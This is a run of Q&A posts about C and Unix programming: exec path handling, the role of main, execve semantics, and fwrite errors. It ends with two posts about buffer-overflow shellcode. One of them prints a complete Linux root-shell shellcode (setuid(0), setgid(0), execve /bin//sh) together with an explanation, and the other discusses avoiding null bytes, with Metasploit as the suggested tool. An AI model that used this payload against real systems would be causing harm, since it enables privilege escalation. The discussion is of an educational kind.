Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
The first parameter of execl is the path of the executable file, my question is that what if there is a space in the path?
My program fails when space exists.
what if there is a space in the path?
It does not matter, as the exec*() functions do not involve a shell or any kind of command interpreter which might choke on the space, or any other special character.
My program fails when space exists.
Does exec() return? Which value do you find in errno or what does perror() print?
exec(....); /* exec*() function do ot return is successful. */
perror("exec() failed);
Related
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 4 years ago.
Improve this question
I just had a question that whenever I write code I had to call all functions (predefined or user defined) in order to use or execute them. So why we don't have to call main function?
The main function is defined by the language itself as the designated start of the program. You don't need to call it because, in effect, your operating system (Linux, macOS, Windows, etc.) does.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 6 years ago.
Improve this question
Let's say that at some point in my program I am using execv and the function ran successfully. Now my program has changed. What happened to it exactly? (Is all the memory get wiped automatically?)
execve() does not return on success, and the text, data, bss, and stack of the calling process are overwritten by that of the program loaded.
That is to say, all data of current process will be gone, and the new program is loaded into memory, replacing the original process.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 7 years ago.
Improve this question
What happens to fwrite if it the drive is full? Assuming that it was compiled on a windows machine with visual studio.
Thanks!
If a write cannot be performed, fwrite() either returns a short item count (if some items have been written before an error occurred) or 0. fwrite() does not block if an error occurs. To differentiate and end-of-file condition from an IO error, use the feof() and ferror() functions.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
I am calling a shellcode using buffer overflow to spawn a root shell. Can somebody explain what this shellcode exactly does? I have tried different shellcodes to spawn a root shell, but this was the only one which worked for me.
\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb
\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd
\x80
On first glance, the code appears to do setuid(0), then setgid(0), then call sys_execve() on some values (which include ASCII codes for "/bin//sh").
Looks like this is pure "payload" code, since I don't see anything to ensure the code is executed on the first place (buffer overflow, stack smashing, etc.).
(Thanks to #Hans Lub for the disassembler link)
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
In a client server program I have to try a buffer overflow attack for a lab exercise. I need to pass a shell code with the input string to the server program. In the shell code there are some values as \x00 but the server terminates the string as soon as it reads \x00.
My shell code is like this:
\x55\x48\x89\xe5\x48\x83\xec\x20\xc7\x45\xe0\x59\x6f\x75\x20\xc7\x45\xe4\x6c\x6f
\x73\x65\x66\xc7\x45\xe8\x21\xba\x98\x0e\x40\x00\xb8\x09\x0e\x40\x00\x48\x89\xd6
My server terminates the string as soon as it sees \x00.
Please suggest a way to overcome this.
You can't pass your shellcode which contains null character to your application while it contains null character as you mentioned. Actually you should change your shellcode. If I remember correctly you could tell Metasploit to not generate specific characters while generating shellcode (in your case: null character).